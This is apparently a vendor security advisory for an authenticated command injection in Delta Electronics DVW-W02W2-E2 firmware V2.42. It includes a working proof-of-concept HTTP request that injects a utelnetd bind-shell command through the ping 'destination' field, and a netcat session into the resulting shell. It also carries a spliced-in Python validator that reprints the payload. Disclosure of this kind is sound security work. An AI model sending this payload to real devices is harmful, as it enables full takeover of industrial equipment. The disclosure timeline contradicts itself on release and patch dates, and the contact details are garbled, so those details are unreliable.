CyberDanube Security Research, 20221130-1
——————————————————————————-
Authenticated Command Injection
product| Delta Electronics DVW-W02W2-E2
vulnerable version| V2.42
fixed version| V2.5.2
–
High
homepage| https://www.deltaww.com
found| 2022-08-01
by| T. Weber (Office Vienna)
| CyberDanube Security Research
| Vienna | St. Pölten
|
| https://www.cyberdanube.com
——————————————————————————-
Vendor description
——————————————————————————-
“Delta was founded in 1971 and is a worldwide provider of thermal energy and power
management solutions. The company’s mission, “To Provide Innovative, Clean and
Energy-Efficient Solutions for a Better Tomorrow,” focuses on key environmental
issues like global climate change. As an energy-saving solutions provider that has
core competences in power electronics and automation, Delta has three business
segments: Power Electronics, Automation, and Infrastructure.”
Source: https://www.deltaww.com/en-US/about/aboutProfile
Vulnerable versions
——————————————————————————-
DVW-W02W2-E2 / V2.42
Overview of vulnerability
——————————————————————————-
1) Authenticated Command Injection
An authenticated command injection is possible on the web server of the device.
It allows an attacker to gain full access to the operating system of the device,
with all consequences. Such a device can act as a key device in an industrial
network or control critical equipment via serial ports, in which case an attacker
can cause more extensive damage in the network.
Proof of Concept
——————————————————————————-
1) Authenticated Command Injection
An authenticated command injection is possible via POST parameters on the web
server. It only works if the “timestamp” parameter in the URL is set correctly.
This proof of concept shows how to bind a shell on port 8889 with a “utelnetd”
listener:
===============================================================================
POST /apply.cgi?/MT_ping.htm%20timestamp=$correct-timestamp$ HTTP/1.1
Host: 192.168.3.148
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 105
Origin: http://192.168.3.148
Connection: close
Referer: http://192.168.3.148/MT_ping.htm
Cookie: xxid=1973719449
Upgrade-Insecure-Requests: 1

submit_flag=mt_ping&hid_ver1=&hid_ser1=&hid_comm1=&hid_ver2=&hid_ser2=&hid_comm2=&destination=`utelnetd%20-p%208889%20-l%20/bin/ash%20-d`
===============================================================================
The “netcat” command can then be used to access the device:
===============================================================================
$ nc 192.168.3.150 8889
!
BusyBox v1.4.2 (2016-08-18 22:45:41 EDT) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
/ #
===============================================================================
This vulnerability was verified manually on an emulated device using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).
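
A defensive check for the request shown above, as an added example (not CyberDanube's or Delta's code): it validates the "destination" field of "mt_ping" form posts against an IP/hostname allowlist, which can serve as server-side input validation or as a filter over captured requests. The function names and the benign sample are assumptions; the flagged sample is the body from the proof of concept.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# Plain hostname: dot-separated labels of letters, digits and inner hyphens.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"(?=.{{1,253}}$){LABEL}(?:\.{LABEL})*")


def is_valid_ping_target(value: str) -> bool:
    """Allowlist check: accept only an IP literal or a plain hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME_RE.fullmatch(value) is not None


def check_request(path: str, body: str) -> list[str]:
    """Return findings for one POST (request path plus raw form body)."""
    if not path.startswith("/apply.cgi"):
        return []
    form = parse_qs(body, keep_blank_values=True)
    if form.get("submit_flag") != ["mt_ping"]:
        return []
    return [
        f"destination is not a host or IP: {dest!r}"
        for dest in form.get("destination", [])
        if not is_valid_ping_target(dest)
    ]


# Sample requests. The first body is the one from the proof of concept above;
# the second is a constructed benign ping request.
PATH = "/apply.cgi?/MT_ping.htm%20timestamp=$correct-timestamp$"
POC_BODY = (
    "submit_flag=mt_ping&hid_ver1=&hid_ser1=&hid_comm1=&hid_ver2=&hid_ser2="
    "&hid_comm2=&destination=`utelnetd%20-p%208889%20-l%20/bin/ash%20-d`"
)
BENIGN_BODY = "submit_flag=mt_ping&destination=192.168.3.1"

if __name__ == "__main__":
    for body in (POC_BODY, BENIGN_BODY):
        print(check_request(PATH, body) or "ok")
```

An allowlist is used instead of a metacharacter blocklist because anything that is not an address or hostname is rejected, whatever shell syntax it carries.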
Solution
——————————————————————————-
Upgrade to firmware V2.5.2.
Workaround
——————————————————————————-
None
Recommendation
——————————————————————————-
CyberDanube recommends that Delta Electronics customers upgrade the firmware to
the latest version available.
Contact Timeline
——————————————————————————-
2022-08-02: Contacting Delta Electronics.
2022-08-10: Consult with Delta Electronics.
2022-08-16: Security contact asked a few questions about responsible
disclosure; sent responses.
2022-08-30: Requested an update.
2022-09-01: Vendor replied that they would need more time to solve the
issues; additional 30 days (until 2022-11-02) for patching.
2022-10-11
2022-10-12: Vendor replied that the fix would be performed on 2022-11-15; shifted
release date to this date.
2022-10-16: Vendor moved the release date to 2022-11-18; shifted advisory
release date to the same day.
2022-10-17
2022-10-18: Asked for an upgrade and moved the release date to 2022-10-22.
2022-10-19: Vendor replied that the release of the patch was not possible.
Contact informed us that the patch would be delayed to the end of
November.
2022-10-21: Asked the vendor for a specific release date.
2022-10-28: Informed the vendor of the advisory release date of 2022-10-30.
2022-10-30: Found firmware patch with the issue date of 2022-11-25 on the vendor's
website.
2022-10-30: Coordinated release of advisory.
Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Email: cyberdanube at com
EOF T. Weber / @2022